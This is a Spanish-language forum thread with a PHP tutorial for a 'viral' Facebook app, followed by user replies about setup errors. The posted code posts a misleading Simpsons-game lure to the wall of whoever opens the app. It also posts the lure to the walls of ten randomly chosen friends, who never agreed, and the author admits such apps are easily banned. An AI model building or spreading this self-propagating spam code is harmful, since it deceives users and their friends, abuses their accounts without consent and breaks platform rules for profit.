E
ePsiLoNz
Beta
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
probando! a ver que tal funciona
En este nuevo ejemplo programaremos una aplicación viral (esto es pan para hoy hambre para mañana XD)
Usaremos el mismo código de [APPS] Crear aplicaciones en un iframe, pero editaremos el index.php para que funcione como queremos.
Usaremos permisos especiales: publish_stream, para publicar en el muro
Lo que hace la aplicacion es, cuando el usuario accede se publica en el muro del usuario y tambien se le publica a 10 amigos al azar en sus muros. Para que no le publique constantemente en el muro usaremos cookies, que duran 1 dia (24 horas).
PHP:<?php //Verificamos las cookies $_E = false; if($_COOKIE['YaTA']=="cicklow") $_E = true; else setcookie("YaTA", "cicklow", (time()+3600*24)); //Header especiales para Cookies en IFRAMES header('P3P:CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"'); //Nuestra config include('config.php'); ?>
Lo que publicaremos
PHP:$_P['message'] = ''; $_P['caption'] = '.'; $_P['description'] = ''; $_P['picture'] = 'http://www.seriesadictos.com/wp-content/uploads/2008/06/los-simpson.jpg'; //Imagen $_P['link'] = 'http://apps.facebook.com/aplicacion/'; //URL Apps $_P['name'] = 'Juega al nuevo juego de los simpsons.'; //Texto
Ahora la parte Viral
PHP://Parte Viral de nuestra apps if($_E){ //Publicamos en el muro del user $me = $facebook->api('/'.$facebook->getUser().'/feed','post',$_P); //Publicamos en el muro de los amigos! $fi = $facebook->api('/me/friends/'); $fi = $fi['data']; shuffle($fi); for($i=0;$i<10;$i++){ try{ if($fi[$i]['id']!="") $postear = $facebook->api('/'.$fi[$i]['id'].'/feed', 'post',$_P); echo "<!-- ID ".$fi[$i]['id']." //-->"; } catch (Exception $e) { } } }
Usando el 1 tutorial mas este agregado tendremos una linda apps viral (lo de pan para hoy y hambre para mañana es porque estas apps generan ingresos y usuarios pero son facilmente baneadas)
Saludos
Aun no lo testeo, pero claramente veo que aun no agregaste la Id de la Aplicacion :/Una vez que me redirije a facebook me dice: Se a producido un error. intentelo mas tarde
Fijate Enlace eliminado
Aun no lo testeo, pero claramente veo que aun no agregaste la Id de la Aplicacion :/
Se ve muy interesante, pero no te pueden banear de facebook por así decirlo por hacerlo?
No entiendo eso del facebook.php
que se debe hacer,
../src/facebook.php
de donde lo saco, por que la verdad, no se 🙂
a que se debe esto man?API Error Code: 191
API Error Description: The specified URL is not owned by the application
Error Message: Invalid redirect_uri: La configuración de la aplicación no permite la URL proporcionada.
Hola Cicklow... aun funciona esta app ?, si es asi algo estoy haciendo mal me sale error
a que se debe esto man?
Hola cicklow he hecho ya todo eso, pero mira como me aparese creo que algo no esta bien :witless: Enlace eliminado si me podrias ayudar jeje es que apenas empeze en esto de hacer apps.